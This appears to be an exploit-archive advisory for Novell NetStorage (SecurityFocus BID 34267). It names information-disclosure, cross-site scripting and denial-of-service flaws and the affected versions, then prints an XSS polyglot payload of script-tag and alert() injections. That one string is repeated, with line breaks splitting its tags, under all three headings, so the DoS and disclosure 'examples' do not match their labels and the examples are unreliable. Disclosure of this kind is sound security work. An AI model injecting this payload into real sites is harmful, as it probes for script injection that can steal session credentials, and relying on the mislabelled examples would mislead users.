31 lines
No EOL
1.4 KiB
Text
31 lines
No EOL
1.4 KiB
Text
source: https://www.securityfocus.com/bid/34267/info
|
|
|
|
Novell NetStorage is prone to the following remote vulnerabilities:
|
|
|
|
- An information-disclosure vulnerability
|
|
- A cross-site scripting vulnerability
|
|
- A denial-of-service vulnerability
|
|
|
|
Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
|
|
|
|
The following are vulnerable:
|
|
|
|
NetStorage 3.1.5-19 on Open Enterprise Server (OES)
|
|
NetStorage 2.0.1 on NetWare 6.5 SP6
|
|
|
|
The following examples are available:
|
|
|
|
Cross-site scripting:
|
|
|
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
|
|
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
|
|
Denial of service:
|
|
|
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
|
|
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
|
|
Information disclosure:
|
|
|
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
|
|
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> |